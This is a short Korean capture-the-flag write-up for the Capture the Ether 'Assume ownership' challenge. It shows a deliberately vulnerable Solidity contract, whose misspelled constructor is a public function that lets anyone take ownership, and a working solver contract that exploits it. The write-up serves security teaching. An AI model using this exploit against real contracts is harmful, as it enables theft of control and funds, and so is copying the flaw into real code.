Capture the ether-Assume ownership

problem link

pragma solidity ^0.4.21;
 
contract AssumeOwnershipChallenge {
    address owner;
    bool public isComplete;
 
    function AssumeOwmershipChallenge() public {
        owner = msg.sender;
    }
 
    function authenticate() public {
        require(msg.sender == owner);
 
        isComplete = true;
    }
}

풀이

    function AssumeOwmershipChallenge() public {
        owner = msg.sender;
    }

생성자 이름에 오타가 있다. public이므로 아무나 호출이 가능하다.

// SPDX-License-Identifier: MIT
 
pragma solidity ^0.8.7;
 
interface AssumeOwnershipChallenge {
    function AssumeOwmershipChallenge() external;
    function authenticate() external;
    function isComplete() external view returns (bool);
}
 
contract AssumeOwnershipSolver {
    address payable public owner;
    AssumeOwnershipChallenge public problem;
 
    constructor (address _problem) {
        owner = payable(msg.sender);
        problem = AssumeOwnershipChallenge(payable(_problem));
    }
 
    function solve() public {
        problem.AssumeOwmershipChallenge();
        problem.authenticate();
 
        require(problem.isComplete(), "fail");
    }
}

다음은 공격 코드이다. 실제로도 이런 어이없는 버그가 일어나긴 하므로 문제로 만든 것 같다..

---

tags: writeup, blockchain, solidity, smart contract, access control vulnerability